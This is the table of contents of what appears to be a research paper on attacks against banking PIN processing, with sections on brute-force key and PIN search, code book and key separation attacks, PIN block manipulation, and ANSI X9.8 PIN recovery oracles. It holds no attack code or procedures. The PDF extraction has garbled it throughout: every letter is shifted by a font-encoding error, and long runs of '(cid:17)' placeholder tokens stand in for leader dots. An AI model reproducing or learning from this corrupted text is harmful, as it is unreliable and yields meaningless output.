,QWURGXFWLRQ(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:21) +(cid:21)(cid:17) .QRZQ(cid:3)$WWDFNV(cid:3)DQG(cid:3)$VVXPHG(cid:3)/HYHO(cid:3)RI(cid:3)6HFXULW\(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:21) +(cid:21)(cid:17)(cid:20)(cid:17) ([KDXVWLYH(cid:3).H\(cid:3)6HDUFK(cid:3)(cid:11)%UXWH(cid:3)IRUFH(cid:12)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:21) +(cid:21)(cid:17)(cid:21)(cid:17) ([KDXVWLYH(cid:3)3LQ(cid:3)6HDUFK(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:21) +(cid:21)(cid:17)(cid:22)(cid:17) 7KH&RGH(cid:3)%RRN(cid:3)$WWDFN(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:22) +(cid:21)(cid:17)(cid:23)(cid:17) .H\(cid:3)6HSDUDWLRQ(cid:3)$WWDFNV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:22) +(cid:22)(cid:17) $WWDFN(cid:3)0RGHOV (cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:22) +(cid:23)(cid:17) 0DQLSXODWLRQ(cid:3)7HFKQLTXHV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:23) +(cid:23)(cid:17)(cid:20)(cid:17) 0RGLI\LQJ(cid:3)WKH(cid:3)3,1(cid:3)%ORFN(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:23) +(cid:23)(cid:17)(cid:21)(cid:17) 0RGLI\LQJ(cid:3)WKH(cid:3)3,1(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:24) +(cid:23)(cid:17)(cid:22)(cid:17) 0RGLI\LQJ(cid:3)WKH(cid:3)OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:25) +(cid:24)(cid:17) ([WHQGLQJ(cid:3).QRZQ(cid:3)$WWDFNV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:25) +(cid:24)(cid:17)(cid:20)(cid:17) 7KH(cid:3)&RGH(cid:3)%RRN(cid:3)DQG(cid:3)([KDXVWLYH(cid:3)6HDUFK(cid:3)5HYLVLWHG(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:25) +(cid:25)(cid:17) 2UDFOHV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:26) +(cid:25)(cid:17)(cid:20)(cid:17) ,QWURGXFWLRQ(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:26) +(cid:25)(cid:17)(cid:21)(cid:17) 7KHRU\(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:26) +(cid:25)(cid:17)(cid:22)(cid:17) ,QVWDQWLDWLQJ(cid:3)WKH(cid:3)2UDFOHV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:28) +(cid:25)(cid:17)(cid:22)(cid:17)(cid:20)(cid:17) 5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOHV(cid:3)K(cid:11)3 (cid:15)(cid:3)(cid:20)(cid:19)(cid:12)(cid:15)(cid:3)O(cid:11)3% (cid:15)(cid:3))(cid:12)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:28) +L(cid:14)(cid:21) L(cid:14)(cid:23) +(cid:25)(cid:17)(cid:23)(cid:17) $16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)3,1(cid:3)/HQJWK(cid:3)’HWHUPLQDWLRQ(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:28) +(cid:25)(cid:17)(cid:24)(cid:17) $16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)(cid:11)3DUWLDO(cid:12)(cid:3)3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:28) +(cid:25)(cid:17)(cid:25)(cid:17) $16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)(cid:11)([WHQGHG(cid:12)(cid:3)3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:19) +(cid:25)(cid:17)(cid:26)(cid:17) 3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:3)ZLWKRXW(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:19) +(cid:25)(cid:17)(cid:26)(cid:17)(cid:20)(cid:17) 5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOH(cid:3)O(cid:11)3% (cid:15)(cid:3))(cid:12)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:19) +L(cid:14)(cid:23) +(cid:25)(cid:17)(cid:26)(cid:17)(cid:21)(cid:17) 5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOH(cid:3)J(cid:11)3 